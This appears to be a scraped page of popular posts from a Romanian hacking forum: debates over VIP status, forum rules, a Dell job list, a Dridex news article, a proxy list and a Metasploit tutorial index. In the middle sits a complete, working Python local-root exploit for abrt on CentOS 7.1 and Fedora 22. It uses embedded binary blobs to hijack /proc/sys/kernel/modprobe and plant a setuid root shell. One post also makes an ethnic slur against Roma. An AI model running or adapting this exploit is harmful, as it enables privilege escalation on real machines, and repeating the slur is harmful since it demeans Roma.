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Propun sa nu se mai acorde V.I.P. pentru un XSS sau alte vulnerabilitati pentru ca, de aceea avem virgini ca, Kronzy care fute reputatia forumului. Sa se acorde puncte de reputatie pana la un anumit punct unde acea persoana se va propune pentru V.I.P. M-am saturat sa vad toti puradeii cum isi bat joc de adevaratele valori ale forumului pentru ca au VIP si sunt tari in pizda.6 points
Dacă face cineva ceva excepțional, da. Și prin asta nu mă refer să urce un shell pe riariahungaria.hu, ci măcar să intre cu tancu într-o șatră de țigani.5 points
Nu ar fi ideal sa nu mai existe nici clase ("bautor de" ori similar) si nici vip? Sa fie un forum nou - mentalitate noua? Sa nu mai incurajam mentalitatea CStrike unde se doresc "functii" si pseudo-putere online sau mentalitatea Metinarilor cu ranking-urile? Cine vrea sa invete, sa participe si sa contribuie o poate face la fel de bine fara alt "incentive". (S-a demonstrat psihologic ca participarea la un forum online este benefica in sine.) In acest fel mai triem din cei care fac +1 aiurea ori se comporta pueril pentru si/sau din cauza acestor "privilegii". Un pic de comunism-socialism in privinta asta nu ar strica.5 points
Cine vrea să ajute o face din plăcere și nu pentru custom title. Și dacă se va da, va fi pe merit nu cerșit.3 points
Salut, Dell angajeaza pe mai multe pozitii. O lista completa o gasiti aici: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/3792178 Cateva job-uri selectate: - Principal Consultant, Penetration Testing - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/principal-consultant-penetration-testing-75285 - Information Security Risk Management Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-risk-management-advisor-78526 - Java Software Development Sr. Analyst - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-development-sr-analyst-80439 - Java Software Development Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-development-advisor-79300 - Senior Security Specialist - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-security-specialist-77371 - Network Security - Firewall Auditor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-security-firewall-auditor-75062 - Junior Linux Admin - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-linux-admin-81076 - Level 2 Technical Support Analyst - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/level-2-technical-support-analyst-81957 - Windows System Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-82417 - Software Testing Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/software-testing-engineer-82376 - Software Testing Jr. Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/software-testing-jr-engineer-82386 - McAfee ESM Security Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/mcafee-esm-security-advisor-81648 Note: 1. Link-urile sunt cu referral, aceasta e procedura interna de recomandare. Avantajul e ca totul se rezolva mult mai repede si va pot ajuta cu ce informatii aveti nevoie despre o anumita pozitie. 2. Nu cred ca se poate lucra remote, trebuie sa fiti in Bucuresti. Exista totusi posibilitatea de a se lucra (din cand in cand) de acasa, pentru anumite pozitii (program de noapte de exemplu) poate chiar mereu. Daca aveti o intrebare imi puteti trimite un PM. // Nytro2 points
Primul sau post pe un thread de acum 2 luni .... Macar a incercat sa arate legit2 points
Va rog sa nu incepeti cu telenovelele. Tema nu e singurul lucru pe care l-am schimbat la forum. O sa incercam sa-l tinem mai curat asa ca incetati cu flame-ul si offtopicul. Exemplu: @AGSQ, @ManutaDeAur, @Kronzy si @Meteosensibilul Ati fost cam offtopic in ultimele raspunsuri. Sistemul de report e foarte fain aici asa ca daca cineva "sare gardu" folositi-l cu incredere in loc sa raspundeti in thread si sa stricati topicul original. #numazic2 points
2 points
@Nytro ar trebui sa dai catorva useri acces sa urce documente la "Downloads". De exemplu in loc sa urc carti/pdf-uri pe site-uri fantoma, mai bine le urc aici.2 points
Trebuie doar sa faci hover cu mouse-ul peste username si apare si registration date.2 points
The Dridex banking trojan that is widely being used by cyber criminals to distribute malware onto users’ machines has now been found distributing a security software. A portion of the Dridex banking Trojan botnet may have been hacked or compromised by an unknown Whitehat Hacker, who replaced the malicious links with Avira Antivirus installers. What is Dridex Banking Trojan? How it Works? Dridex malware – also known as Bugat and Cridex – is believed to have been created by cyber criminals in Eastern Europe in an effort to harvest online banking details. Even after a high-profile takedown operation in late 2015, the Dridex botnet seems to be active again. The Dridex virus typically distributes itself through spam messages or emails that include malicious attachments, most often a Microsoft Office file or Word document integrated with malicious macros. Once the malicious file has been clicked, the macros download and install the main payload of the virus – the trojan program itself – from a hijacked server, which installs and runs on the victim's computer. The Dridex trojan program then creates a keylogger on the infected machine and manipulates banking websites with the help of transparent redirects and web-injects. This results in stealing victim's personal data like usernames and passwords, with an ultimate aim to break into bank accounts and siphon off cash. Hacker replaces Trojan with Anti-virus However, the recent Hack Surprises: Instead of distributing banking trojan, a portion of the Dridex botnet currently seems to be spreading legitimate copies of the free anti-virus software from Avira, as the company has announced itself. "The content behind the malware download [link] has been replaced, it is now providing [a legitimate], up-to-date Avira web installer instead of the usual Dridex loader," explained Avira malware expert Moritz Kroll, reported Reg. Avira believes that the white hat hacker or hackers may have hacked into a portion of infected web servers using the same flaws the malware authors used and then replaced the malicious code with the Avira installer. So, once infected, instead of receiving Dridex malware, the victims get a valid, signed copy of Avira antivirus software. "We still don't know exactly who is doing this with our installer and why – but we have some theories," said Kroll. "This is certainly not something we are doing ourselves." Although the motives behind including the Avira software is still unclear, these kinds of actions are considered to be illegal in many countries, said Kroll. What can be done to protect From Malware Attacks? The guidance for preventing yourself from being a part of the Dridex Banking Trojan botnet is: Ensure you have an updated antivirus program running on your PC, which should be able to intercept the malicious attachments before they are opened. One of the best measures for securing your online environment is to deploy an at the network layer, which is especially useful to quickly detect malware and other threats in your network when integrated with a and SIEM (Security Intelligence and Event Monitoring) solution, such as (USM). Be careful of opening email attachments sent from an unknown email address, particularly (in this case) Microsoft Word and Excel files. Disable Macros in MS Office, or at least set the Macros to request permission before they run. haha2 points
1 point
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[RO] Regulament categorii: Free stuff - Nu se accepta root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta conturi sau acces la diferite servicii care nu va apartin RST Market - Nu se accepta vanzarea, cumpararea sau schimbul de date care faciliteteaza frauda online sau bancara - Nu se accepta vanzarea, cumpararea sau schimbul de root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta vanzarea, cumpararea sau schimbul de conturi care nu va apartin [EN] Terms and conditions - The administrators of this website do not take any responsibility for the content of the website! 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If you consider that the punishment is not correct, please contact one of the administrators of this website. You can be warned for the following actions: - Off-topic - if you deviate from the topic subject - Double post - If you have multiple consecutive posts - Useless post - If you post without any reason and the post is not useful to the topic subject - Reopen thread - Check the last post date on a thread and do not post there if it is very old - Insulted member - Do not attack and insult other members - Improper name - Please use descriptive thread subjects - Improper language - You are not on IRC, please be as correctly grammatical as possible - Referral links - Do not post adf.ly or other stupid referral links - Creating an account on the forum only to ask for invitations on trackers, other forums, etc. - Other - Any other abuse of the forum rules For multiple warnings, the result can be temporary or permanent ban: - for 3 warnings - ban 5 days - for 4 warnings - ban 30 days - for 5 warnings - permanent ban [EN] Rules 1. Do not post or request root, vps, smtp or anything else. 2. Specify the original sources for your posts when you post a tool or a tutorial from other website. 3. Some categories (such as Free stuff or RST Market) have internal rules. Follow that rules when you post in that categories. 4. Each tool or tutorial must contain at least a small description in English or Romanian. Links to programs must be links to the official site of those programs. 5. Publishing or trying to publish private personal information will result in permanent ban. 6. Do not request VIP or Moderator access, you will not get it. If we need you, we will search you. 7. A moderator or an administrator have the right to ban anyone on this forum if he considers that the user is useless for the forum. 8. There is a "Report" button, please use it, do not post to warn other users about their mistake. 9. You are not allowed to create tools or write articles in the name of RST without the approval of one of the administrators. 10. You are not allowed to attack or insult other persons on that chat and on the forum. 11. If you have more than one account you can be banned on all your accounts. 12. Posting vulnerabilities i websites that do not have a bug bounty program is forbidden. RST staff have the right to modify at any time the Terms and conditions and the rules of this forum without a notification. [EN] Category rules Free stuff: - It is forbidden to post or request root, vps, smtp or anything else that do not belong to you - It is forbidden to post accounts for different websites or services that do not belong to you RST Market: - It is forbidden to sell, buy or exchange data that facilitates online fraud or banking fraud - It is forbidden to sell, buy or exchange roots, vps, smtp, rdp or anything else that do not belong to you - It is forbidden to sell, buy or exchange accounts that do not belong to you1 point
[h=1]Centos 7.1/Fedora 22 - abrt Local Root[/h] #!/usr/bin/python # CVE-2015-5273 + CVE-2015-5287 # CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too) # abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage # rebel 09/2015 # ---------------------------------------- # [user@localhost ~]$ id # uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 # [user@localhost ~]$ cat /etc/redhat-release # CentOS Linux release 7.1.1503 (Core) # [user@localhost ~]$ python abrt-centos-fedora.py # -- lots of boring output, might take a while on a slow connection -- # /var/spool/abrt/abrt-hax-coredump created # executing crashing process.. # success # bash-4.2# id # uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 import time,os,datetime,sys,resource,socket fedora = "Fedora" in open("/etc/redhat-release").read() # mkdir dir1 # ln -s /var/spool/abrt dir1/hax # mkdir dir2 # mkdir dir2/hax # ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump # cd dir1 # find . -depth -print | cpio -o > ../cpio1 # cd ../dir2 # find . -depth -print | cpio -o > ../cpio2 cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip") cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip") if fedora: cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt") payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n" # we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries # and we can't control the contents of that region. on 32 bit binaries [stack] is at the end # the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written # to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip") # most people don't have nasm installed so i preassembled it # if you're not brave enough to run the preassembled file, here's the code """ ; abrt-hax.asm ; nasm -f bin -o abrt-hax abrt-hax.asm BITS 32 org 0x08048000 ehdr: ; Elf32_Ehdr db 0x7F, "ELF", 1, 1, 1, 0 ; e_ident times 8 db 0 dw 2 ; e_type dw 3 ; e_machine dd 1 ; e_version dd _start ; e_entry dd phdr - $$ ; e_phoff dd 0 ; e_shoff dd 0 ; e_flags dw ehdrsize ; e_ehsize dw phdrsize ; e_phentsize dw 1 ; e_phnum dw 0 ; e_shentsize dw 0 ; e_shnum dw 0 ; e_shstrndx ehdrsize equ $ - ehdr phdr: ; Elf32_Phdr dd 1 ; p_type dd 0 ; p_offset dd $$ ; p_vaddr dd $$ ; p_paddr dd filesize ; p_filesz dd filesize ; p_memsz dd 5 ; p_flags dd 0x1000 ; p_align phdrsize equ $ - phdr _start: inc esp cmp dword [esp],0x706d742f jne l or esp,0xfff inc esp mov edx,500 l3: mov ecx,msglen mov ebx,message sub esp,ecx l2: mov al,[ebx] mov [esp],al inc esp inc ebx loop l2 sub esp,msglen dec edx cmp edx,0 jne l3 mov eax,0x41414141 jmp eax message db '////////tmp/hax.sh',0x0a,0 msglen equ $-message """ build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1] os.chdir("/tmp") open("build_ids","w+").write(build_id + "\n") print build_id def child(): timestamp = int(time.time()) for i in xrange(0,3): try: t = datetime.datetime.fromtimestamp(timestamp+i) d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid()) os.mkdir(d) os.chmod(d,0777) os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio") print "created %s" % d except: pass os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y") try: os.mkfifo("/var/tmp/haxfifo") os.chmod("/var/tmp/haxfifo",0666) except: pass def fifo(a): print "reading from fifo.." open("/var/tmp/haxfifo").read() print "done" print "writing to fifo.." open("/var/tmp/haxfifo","w+").write(a) print "done" if os.fork() == 0: child() print "first cpio..." fifo(cpio1) os.wait() time.sleep(1) if os.fork() == 0: child() print "second cpio..." fifo(cpio2) os.wait() time.sleep(1) if fedora: sym = "/var/tmp/abrt/abrt-hax-coredump" else: sym = "/var/spool/abrt/abrt-hax-coredump" try: os.lstat(sym) except: print "could not create symlink" sys.exit(-1) print "%s created" % sym open("/tmp/abrt-hax","w+").write(elf) os.chmod("/tmp/abrt-hax",0755) if os.fork() == 0: resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,)) print "executing crashing process.." os.execle("/tmp/abrt-hax","",{}) os.wait() time.sleep(1) if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read(): print "could not modify /proc/sys/kernel/modprobe" sys.exit(-1) open("/tmp/hax.sh","w+").write(payload) os.chmod("/tmp/hax.sh",0755) try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132) except: pass time.sleep(0.5) try: os.stat("/tmp/sh") except: print "could not create suid" sys.exit(-1) print "success" os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''') Sursa: https://www.exploit-db.com/exploits/38835/1 point
Oricum nu se mai acorda VIP momentan asa ca nu are rost sa mai continuam aici. Closed.1 point
@EssenceOfLife , @Cripterul - dupa ce va atentioneaza @M2G sa va potoliti voi nu aveti nici o strabatere... daca tot e thread de sugestii poate ca ar fi nevoie de un Mass Purge... un 30-40 banuri asa de "casa noua", apoi e doar peace n tranquility pe forum.1 point
ONU decide in favoarea lui Assange http://thehackernews.com/2016/02/julian-assange-arbitrary-detention.html http://www.reuters.com/article/ecuador-sweden-assange-idUSKCN0VD0B91 point
Inca ma mai intreb de ce acest topic nu a fost deschis in VIP arena, ci aici.... Plm nu am VIP si nu ma plang ...1 point
Some basics tutorials of Metasploit- by Spirit Hello Guys, My name is Spirited wolf and today i am here to share my some nooby tutorial's of Metasploit :blackhat: So, first thing is what is Metasploit? ->So, my answer will be Metaspoit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems. Its a powerful tool used for penetration testing. Learning to work with metasploit needs a lot of efforts and time. Ofcourse to can learn metasploit overnight, it needs lots of practice and patience. So, here you go the :drinks: Cheerz... [Part 1]Hacking into Windows using Setoolkit+Measploit tutorial-By Spirit [Part 2]Create a Key logger to Sniff HTTPS data with metasploit tutorial-By Spirit [Part 3]Disable your victim's Windows Firewall using Metasploit-Tutorial by Spirit [Part 4]How to exploit any Windows/Linux by Firefox_xpi_bootstrapped_add-on exploit tutorial-By Spirit [Part 5]OS Command Injection Tutorial-By Spirit If you Like these Tutorial then please subscribe my channel and also do share please :drinks: But any ways it just for the newbies not for professional's :ifyouknowwhatImean: Please comment if i done anything wrong.:blackhat: ----------------------------------------------------------------------------------------------------------- This tutorial is for educational purpose only. I'll not responsible for any harm. ------------------------------------------------------------------------------------------------------------ Use your skills to protect other not to harm kiki emoticon Thanks for watching guys and keep watching pentesting with spirit Our youtube Channel link:: https://www.youtube.com/c/Pentestingwithspirit Facebook page link:: http://facebook[dot]com/Pentest.with.spirit1 Twitter account:: @spirit31131 point
Prea o faci pe interesantu' si pe importantu'. Daca tot zici ca nu ai treaba cu forumul da-ti logout si gata, ai scapat de toti anonimii astia cum le zici tu. Ca parca tu mare personalitate esti.1 point
Tocmai d-aia am spus ca doar unele persoane sa aiba acces. Eu de exemplu stiu sa ma uit daca o carte este free sau nu. Si nu neaparat carti. Putem pune o gramada de chestii care sa aduca lume buna aici, ca pana la urma asta ne dorim toti.1 point
Ar fi ok sa fie join date chiar sub avatar, cum era in trecut, sa nu se mai intre la fiecare user in parte. Astfel unii pot sa se fereasca de tepe, au mai mare incredere in unul din 2011 decat in unul din 2016.1 point
Have a look at this widget. If you want to use it on a model you have to use: ModelMultipleChoiceField You can find several sources.1 point
off// Tu de ce crezi ca a pus la sfarsit? Captain obvious! on// I don't give a fuck about VIP or user title!1 point
Multumesc de sustinere, poate scapam de Metin si servere Counter-Strike. Si eu ma joc dar asta nu e forum de jocuri, de aceea vreau sa scapam de toti copii cu roate si inundatii.1 point
# Date: Fri, 05 Feb 2016 10:45:14 +0000; 2.21; 720; anonymous proxy; Thailand (Bangkok);; 0; 0; anonymous proxy; Thailand;; 0; 0; anonymous; Thailand (Bangkok);; 0.94; 1772; anonymous proxy; Switzerland;; 0.92; 2035; anonymous; Switzerland;; 11.35; 218; anonymous; Myanmar;; 0; 0; anonymous; Hong Kong;; 0; 0; anonymous; Germany (Mettmann);; 0; 0; anonymous proxy; Germany (Regnitzlosau);; 0.91; 1509; anonymous proxy; China;; 1.39; 2374; anonymous proxy; China;; 0.87; 1607; anonymous; China;; 0.63; 240; anonymous proxy; Brazil;; 0; 0; anonymous; Sweden;; 7.27; 137; anonymous; Indonesia (Jakarta); Cu placere.1 point
Atunci cred ca poti folosi proxy-uri publice, doar sa le verifici inainte sa vezi ca merg.1 point
Salut, ce vrei sa faci cu ele? Daca vrei sa faci porcarii, sa stii ca nu sunt tocmai utile, sunt multe honeypot-uri. Cauta pe Google "proxy list" si gasesti cu tonele.1 point
VIP Area era de forma, nu se posta mai nimic util acolo. Singurul lucru util pentru VIPi era acel Custom Title, care nu inteleg de ce era asa dorit... Deocamdata nu o sa fie nimic, o sa vedem pe parcurs.1 point
Deocamdata nu, vream sa vedem cu evolueaza lucrurile. Daca sunt persoane utile pentru forum, probabil le vom lasa posibilitatea sa schimbe user-title, dar sincer, nu mi se pare cine stie ce "fitza". Nota: Am setat limita la chat de 60 de minute, nu ar trebui sa mai primiti kick asa repede.1 point
O sa ma uit la partea de logare, folositi logarea de pe forum, cea de pe homepage e improvizata si nu trimit toate variabilele.1 point
1 point
Well imi pare rau ca au mai disparut din topicuri, insa schimbarea e binevenita din punctul meu de vedere. @wtf daca o sa mai am timp si exista interes in domeniul banilor online o sa mai scriu stai linistit ! Numai Bine.1 point
Dacă tot v-ați pus pe reînnoit și adoptat o față mai white-hat, schimbați numele categoriei "Black SEO și Monetizare" în "Internet Marketing" , promit că o să mă ocup eu cu tot ce pot de el cu e-bookuri, studii de caz, tehnici de monetizare și îndrumări generale pentru useri.1 point
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L-ai bagat in priza sa vezi daca merge root ala? ai verificat alimentarea?1 point
1 point
1 point
1 point
1 point
1 point
Pana la urma care-i solutia?-1 points
Pana si http://he.net au un "DIZAN" mai fain, subliniez ca pe he.net e accelasi "DIZAIN" din 2002...-1 points
-2 points